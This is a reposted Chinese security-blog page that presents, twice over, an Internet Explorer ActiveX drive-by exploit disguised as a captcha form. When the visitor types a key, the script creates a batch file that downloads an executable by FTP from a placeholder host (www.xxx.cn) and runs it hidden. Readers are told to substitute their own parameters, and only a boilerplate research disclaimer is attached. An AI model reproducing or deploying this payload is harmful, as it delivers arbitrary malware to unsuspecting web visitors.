Internet Explorer ActiveX Installation 利用程序 's

admin
admin
admin
140552
文章
117
评论
2017年4月12日17:07:49评论279 views字数 1240阅读4分8秒阅读模式
摘要

信息来源:H4x0r's Blog可以说是新的网马吧。
利用了ActiveX控件。
<HTML>
<HEAD>
<TITLE>Internet Explorer ActiveX Installation Vulnerability</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<SCRIPT>

function doInstallControl() {
document.body.innerHTML +=
"<OBJECT id=wsh CLASSID=/"clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B/" TYPE=/"application/x-oleobject/" WIDTH=/"0/" HEIGHT=/"0/">/r/n" +
"</OBJECT>"+
"<OBJECT id=fso CLASSID=/"clsid:0D43FE01-F093-11CF-8940-00A0C9054228/" TYPE=/"application/x-oleobject/" WIDTH=/"0/" HEIGHT=/"0/">/r/n" +
"</OBJECT>";
a=document.getElementById("captcha");
a.value+="n";
a.focus();
var wsh=document.getElementById("wsh");
var fso=document.getElementById("fso");
var f=fso.CreateTextFile("c://a.bat");
s="ftp -n -s:a.bat/r/n"+
"open www.xxx.cn/r/n"+
"user UserNameHere/r/n"+
"Password_Here/r/n"+
"get The_exe_file.exe c://m.exe/r/n"+
"bye/r/n"+
"m.exe";
f.Write(s);
f.Close();
wsh.run("c://a.bat",0);

}

function doWaitEntry() {

if (event.keyCode == 78 || event.keyCode == 110) {
doInstallControl();
}

}

</SCRIPT>

<FORM ACTION="" METHOD="GET">
Please enter the text you see on the left:<BR><BR>

<B>onyy</B> <INPUT TYPE="text" ID="captcha" ONKEYPRESS="doWaitEntry()" >
</FORM>

</BODY>
</HTML>
s="ftp -n -s:a.bat/r/n"+
"open www.xxx.cn/r/n"+
"user UserNameHere/r/n"+
"Password_Here/r/n"+
"get The_exe_file.exe c://m.exe/r/n"+
自己改参数

信息来源:H4x0r's Blog

可以说是新的网马吧。
利用了ActiveX控件。
<HTML>
<HEAD>
<TITLE>Internet Explorer ActiveX Installation Vulnerability</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<SCRIPT>

function doInstallControl() {
document.body.innerHTML +=
"<OBJECT id=wsh CLASSID=/"clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B/" TYPE=/"application/x-oleobject/" WIDTH=/"0/" HEIGHT=/"0/">/r/n" +
"</OBJECT>"+
"<OBJECT id=fso CLASSID=/"clsid:0D43FE01-F093-11CF-8940-00A0C9054228/" TYPE=/"application/x-oleobject/" WIDTH=/"0/" HEIGHT=/"0/">/r/n" +
"</OBJECT>";
a=document.getElementById("captcha");
a.value+="n";
a.focus();
var wsh=document.getElementById("wsh");
var fso=document.getElementById("fso");
var f=fso.CreateTextFile("c://a.bat");
s="ftp -n -s:a.bat/r/n"+
"open www.xxx.cn/r/n"+
"user UserNameHere/r/n"+
"Password_Here/r/n"+
"get The_exe_file.exe c://m.exe/r/n"+
"bye/r/n"+
"m.exe";
f.Write(s);
f.Close();
wsh.run("c://a.bat",0);

}

function doWaitEntry() {

if (event.keyCode == 78 || event.keyCode == 110) {
doInstallControl();
}

}

</SCRIPT>

<FORM ACTION="" METHOD="GET">
Please enter the text you see on the left:<BR><BR>

<B>onyy</B> <INPUT TYPE="text" ID="captcha" ONKEYPRESS="doWaitEntry()" >
</FORM>

</BODY>
</HTML>
s="ftp -n -s:a.bat/r/n"+
"open www.xxx.cn/r/n"+
"user UserNameHere/r/n"+
"Password_Here/r/n"+
"get The_exe_file.exe c://m.exe/r/n"+
自己改参数

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月12日17:07:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Internet Explorer ActiveX Installation 利用程序 'shttps://cn-sec.com/archives/48636.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息